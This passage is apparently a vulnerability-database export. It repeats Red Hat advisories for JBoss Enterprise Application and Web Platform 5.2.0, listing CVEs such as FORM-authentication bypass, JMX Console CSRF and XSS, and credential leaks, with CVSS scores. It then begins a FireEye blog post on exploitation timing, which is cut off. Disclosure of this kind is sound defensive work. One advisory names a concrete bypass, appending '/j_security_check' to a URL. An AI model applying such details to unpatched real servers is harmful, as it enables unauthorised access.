(CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0198) Important: JBoss Enterprise Web Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2018-06-06T22:39:14", "id": "RHSA-2013:0198", "href": "https://access.redhat.com/errata/RHSA-2013:0198", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:40:55", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0194) Important: JBoss Enterprise Application Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2018-06-06T22:37:45", "id": "RHSA-2013:0194", "href": "https://access.redhat.com/errata/RHSA-2013:0194", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:42:06", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0196) Important: JBoss Enterprise Web Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2016-04-04T14:31:35", "id": "RHSA-2013:0196", "href": "https://access.redhat.com/errata/RHSA-2013:0196", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:39:43", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0191) Important: JBoss Enterprise Application Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2018-06-06T22:37:46", "id": "RHSA-2013:0191", "href": "https://access.redhat.com/errata/RHSA-2013:0191", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:44:03", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0192) Important: JBoss Enterprise Application Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2016-04-04T14:31:19", "id": "RHSA-2013:0192", "href": "https://access.redhat.com/errata/RHSA-2013:0192", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:38:22", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0195) Important: JBoss Enterprise Web Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2018-06-06T22:39:14", "id": "RHSA-2013:0195", "href": "https://access.redhat.com/errata/RHSA-2013:0195", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2021-10-30T08:30:35", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\n![Percentage of vulnerabilities exploited at various times in relation to patch release](https://www.fireeye.com/sites/default/files/inline-images/think-fast1.png)Figure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be 